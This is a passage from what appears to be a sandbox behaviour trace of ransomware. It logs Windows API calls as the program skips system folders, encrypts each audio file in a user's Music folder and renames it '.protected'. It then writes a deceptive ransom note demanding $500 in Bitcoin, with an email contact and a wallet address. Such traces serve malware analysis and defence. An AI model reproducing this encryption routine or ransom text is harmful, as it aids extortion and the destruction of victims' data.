HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a.protected")) returned 1 [0092.318] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="Windows") returned -1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="Program Files") returned -1 [0092.318] lstrcmpiW 
(lpString1="K5AFqd3fkq-1C.wav", lpString2="Program Files (x86)") returned -1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="$Recycle.bin") returned 1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="System Volume Information") returned -1 [0092.318] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrIW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".protected") returned 0x0 [0092.318] lstrcmpW (lpString1="K5AFqd3fkq-1C.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".txt") returned 0x0 [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".rar") returned 0x0 [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".zip") returned 0x0 [0092.318] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.319] CloseHandle (hObject=0x14c) returned 1 [0092.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav.protected") returned 120 [0092.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav.protected")) returned 1 [0092.320] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Windows") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Program Files") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Program Files (x86)") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="$Recycle.bin") returned 1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="System Volume Information") returned -1 [0092.320] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrIW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".protected") returned 0x0 [0092.320] lstrcmpW (lpString1="K9R1dM2UixIIQs.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.320] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.320] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".txt") returned 0x0 [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".rar") returned 0x0 [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".zip") returned 0x0 [0092.320] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.321] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.321] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) 
returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.321] CloseHandle (hObject=0x14c) returned 1 [0092.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav.protected") returned 121 [0092.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav.protected")) returned 1 [0092.322] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Windows") returned -1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Program Files") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Program Files (x86)") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="$Recycle.bin") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="System Volume Information") returned -1 [0092.322] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.322] 
StrStrIW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".protected") returned 0x0 [0092.322] lstrcmpW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0092.322] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.322] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".txt") returned 0x0 [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".rar") returned 0x0 [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".zip") returned 0x0 [0092.331] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.332] SetFilePointerEx (in: 
hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.332] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.332] CloseHandle (hObject=0x14c) returned 1 [0092.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3.protected") returned 127 [0092.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3.protected")) returned 1 [0092.333] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Windows") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Program Files") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Program Files (x86)") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="$Recycle.bin") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="System Volume Information") returned 1 [0092.333] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.333] StrStrIW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".protected") returned 0x0 [0092.333] lstrcmpW (lpString1="zkg0KJsW3g9.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.333] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.333] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".txt") returned 0x0 [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".rar") returned 0x0 [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".zip") returned 0x0 [0092.334] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.334] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.334] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.335] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.335] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.335] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.335] CloseHandle (hObject=0x14c) returned 1 [0092.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav.protected") returned 118 [0092.335] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav.protected")) returned 1 [0092.335] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.335] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.336] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\RESTORE_FILES.txt") returned 110 [0092.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.336] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.336] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.337] lstrlenA (lpString="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") returned 684 [0092.337] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.337] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.337] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
